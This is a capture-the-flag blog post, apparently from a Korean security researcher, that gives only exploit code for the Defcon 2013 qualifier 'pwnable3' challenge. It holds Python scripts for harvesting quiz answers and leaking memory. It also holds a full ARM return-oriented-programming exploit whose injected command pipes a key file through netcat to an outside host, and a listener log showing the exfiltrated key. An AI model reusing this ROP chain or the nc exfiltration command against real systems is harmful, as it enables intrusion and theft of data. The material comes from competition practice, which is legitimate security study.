Defcon CTF 2013 Qual - pwnable3 (Exploit only)

2013. 7. 7. 19:05·CTF/2013

Category : Pwnables


ergab


Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass



gen_answer_dict.py 

import re

from socket import *

from struct import pack, unpack


HOST = "lolergab.shallweplayaga.me"

PORT = 5000


def SaveFile(data):

f = open('dic.txt', 'r')

if f.read().find(data) != -1:

f.close()

return

f.close()


f = open('dic.txt', 'at')

f.write(data)

f.close()


def Attack(s):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

data = re.search('1\) (.*)', l[1])

choice = data.group(1)

s.send("1\n")

if s.recv(1024).find('Wrong!!') == -1:

SaveFile(quest + ":" + choice + "\n")

print 'OK'

return 0


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

while True:

main() 




leak_memory.py 

import re

from socket import *

from struct import pack, unpack

import time, sys


p = lambda x: pack("<L", x)


HOST = "lolergab.shallweplayaga.me"

#HOST = "192.168.0.171"

PORT = 5000


senddata = 0x3C9C


payload = ""

payload += "a"*0x0f+"\n"


def GetDatabase():

dic = {}

f = open('dic.txt', 'r')

for line in f:

line = line.strip('\n')

(quest, answer) = line.split(':')

#print dic, " ", quest, " ", answer

dic[quest] = answer

f.close()

return dic


def Attack(s):

dic = GetDatabase()

for _ in range(5):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

answer = dic[quest]

choice = 0

for i in range(1, 4+1):

if l[i].find(answer) != -1:

choice = i

break

s.send(str(choice) + '\n')

s.recv(1024)

print s.recv(1024)

time.sleep(1)

        raw_input(">")

s.send(payload)

time.sleep(1)

print s.recv(1024)

return 0


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

main() 



Exploit

import re

from socket import *

from struct import pack, unpack

import time, sys


p = lambda x: pack("<L", x)


HOST = "lolergab.shallweplayaga.me"

PORT = 5000


base = 0xb6f54000 # server

##base = 0xb6faf000 # local

system = 0xb6cbbbd8  # server

##system = 0xb6d19bd8 # local

sleep = 0xb6d1af30 # server

freespace = 0x0000d558

senddata = 0x3C9C

recvdata = 0x3DC4

command = "cat key | nc bean.b10s.org 31337\x00"


"""

.text:000045FC 07 00 A0 E1                             MOV     R0, R7

.text:00004600 08 10 A0 E1                             MOV     R1, R8

.text:00004604 0A 20 A0 E1                             MOV     R2, R10

.text:00004608 01 40 84 E2                             ADD     R4, R4, #1

.text:0000460C 33 FF 2F E1                             BLX     R3

.text:00004610 06 00 54 E1                             CMP     R4, R6

.text:00004614 F7 FF FF 1A                             BNE     loc_45F8

.text:00004618 F8 85 BD E8                             LDMFD   SP!, {R3-R8,R10,PC}

"""



payload = ""

payload += "a"*0x10

payload += p(base+0x00004618) # .text:00004618                 LDMFD   SP!, {R3-R8,R10,PC}

#############################

payload += p(base+0x00004624) # .text:00004624                 BX      LR

payload += p(0x00000000) * 2

payload += p(0x00000001)

payload += p(0x00000004) # r0

payload += p(base+freespace) # r1

payload += p(len(command)) # r2

############################

payload += p(base+0x000045FC)

############################

payload += p(0x000000de)

payload += p(0x11111111)*6

############################

#payload += p(sleep)

payload += p(base+recvdata)

###########################

payload += p(0x11111111)*7

##########################

payload += p(base+0x00004618) # .text:00004618                 LDMFD   SP!, {R3-R8,R10,PC}

###########################

payload += p(base+0x00004624) # .text:00004624                 BX      LR

payload += p(0x00000000)*2

payload += p(0x00000001)

payload += p(base+freespace)

payload += p(0x00000001)*2

###########################

payload += p(base+0x000045FC)

##########################

payload += p(0x11111111)*7

##########################

payload += p(system)

##########################

payload += "\n"


def GetDatabase():

dic = {}

f = open('dic.txt', 'r')

for line in f:

line = line.strip('\n')

(quest, answer) = line.split(':')

#print dic, " ", quest, " ", answer

dic[quest] = answer

f.close()

return dic


def Attack(s):

dic = GetDatabase()

for _ in range(5):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

answer = dic[quest]

choice = 0

for i in range(1, 4+1):

if l[i].find(answer) != -1:

choice = i

break

s.send(str(choice) + '\n')

s.recv(1024)

print s.recv(1024)

time.sleep(1)

s.send(payload)

s.send(command)

time.sleep(1)

print s.recv(1024)


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

main()




root@ubuntu:~# ./exploit.py


--------------------------------------------------------------------


root@ubuntu:~# nc -lv 31337

Connection from 131.247.27.200 port 80 [tcp/http] accepted

The key is: Hang on, I know what I need. Fish fingers. And custard. 




Co written with StolenByte

저작자표시 (새창열림)

'CTF > 2013' 카테고리의 다른 글

Defcon CTF 2013 Qual - shellcode3 (Exploit only)  (0) 2013.07.07
Defcon CTF 2013 Qual - shellcode2 (Exploit only)  (0) 2013.07.07
Plaid CTF 2013 Write up collection  (0) 2013.04.23
Plaid CTF 2013 - pork (Exploit only)  (0) 2013.04.22
Codegate 2013 Qual - Vulnerab 500 (Exploit only)  (0) 2013.04.17
'CTF/2013' 카테고리의 다른 글
  • Defcon CTF 2013 Qual - shellcode3 (Exploit only)
  • Defcon CTF 2013 Qual - shellcode2 (Exploit only)
  • Plaid CTF 2013 Write up collection
  • Plaid CTF 2013 - pork (Exploit only)
pwn3r_45
pwn3r_45
  • pwn3r_45
    pwn3r_45
    pwn3r_45
  • 전체
    오늘
    어제
    • View All (155)
      • Paper (0)
        • Power Grid (0)
        • Software_Kernel (0)
        • Exploitation (0)
        • RTOS (0)
        • UAV (0)
        • SCADA (0)
      • Articles (0)
      • Personal (18)
      • Technical Note (9)
        • Hardware (1)
        • Vulnerability Research (8)
        • Binary Exploitation (5)
        • PR23 (0)
        • Vulnerability (1)
        • Linux Kernel (1)
        • 현대암호 (0)
      • CTF (90)
        • 2025 (0)
        • 2024 (1)
        • 2023 (5)
        • 2019 (5)
        • 2018 (20)
        • 2017 (7)
        • 2016 (6)
        • 2015 (1)
        • 2014 (3)
        • 2013 (14)
        • 2012 (6)
      • Wargame (22)
        • FTZ (13)
        • Lord Of Bof - Redhat 6.2 (0)
        • IO.smashthestack.org (5)
        • Amateria.smashthestack.org (0)
        • pwnable.tw (0)
        • Vortex.overthewire.org (3)
        • Webhacking.kr (0)
        • reversing.kr (0)
        • dreamhack.io (0)
        • CodeEngn (1)
      • Reverse engineering (1)
      • Issue (13)
        • Conference_CTF info (13)
      • Coding (0)
        • C# (0)
      • ETC (2)
      • 미완성 (0)
  • 블로그 메뉴

    • Home
    • Tag
    • MediaLog
    • LocationLog
    • Guestbook
    • Admin
    • Write
  • 링크

    • 6l4ck3y3
    • idkwim
    • gogil
    • dakuo
    • badcob
    • 임준오씨 블로그
    • 김용진씨 블로그
    • david942j
    • orange tsai
    • pwndiary
    • theori
    • tacxingxing
    • jinmo123's team blog
    • ConS-tanT
    • jaybosamiya
    • procdiaru
  • 공지사항

  • 인기 글

  • 태그

    web
    power of community
    vuln
    정보보호올림피아드
    pwnables
    HUST
    후기
    csaw ctf
    gnuboard
    csaw
    HUST2011
    POC
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.3
pwn3r_45
Defcon CTF 2013 Qual - pwnable3 (Exploit only)
상단으로

티스토리툴바